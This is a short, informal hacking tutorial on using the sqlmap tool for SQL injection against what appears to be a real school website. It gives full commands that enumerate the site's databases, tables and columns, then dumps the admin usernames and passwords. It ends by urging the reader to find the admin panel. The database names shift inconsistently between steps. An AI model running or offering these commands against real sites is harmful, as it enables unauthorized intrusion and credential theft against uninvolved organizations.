SQLmap Step by Step Tutorial
Today we will learn how to operate the "best SQL injection exploiting tool" i.e SQLMAP
Today we will learn how to operate the "best SQL injection exploiting tool" i.e SQLMAP
its a python tool , and it is preloaded in almost every Back Track version
first of all
we need a vulnerable target!
here it is
ok first step is to fatch the databases
command will be like this one
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 --dbs
-u is stand for which is vulnerable to SQL injection
and --dbs is used for fatching total databases in website :D
ok after completing the process of fataching the databases it will something like that available databases(8) [*]informtion_schema [*]alliedschools_web
now we are going to expoit database alliedschools_web and fatch the tables present in it XD
ok command will change a little bit :-
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_web --tables
here :-
-D and then name of the database from which we want to fatch tables and
--tables is for fatching total table present in the database
after processing we will get the tables present in database "alliedschools_web"
after processing we will get something like that Database: alliedschools_campus [18 Tables ] admin campus ...... ......
now we are going to fatch the cloumns from table admin of database alliedschools_campus
command is :-
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin --columns
now we will get something like this Database: alliedschools_campus Table : admin [12 columns ] admin_password admin_username admin_email ...... ......
This is the last command to get the admin username and password command is python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin -C admin_password, admin_username --dump
and after finishing process we will get something like that Database: alliedschools_campus Table : admin [6 entries] admin_password admin_username $erver admin ...... ......
Now You Have admin Password of website, Find admin panel and ...xD
Ceridts To : Zero & Team indishell :D
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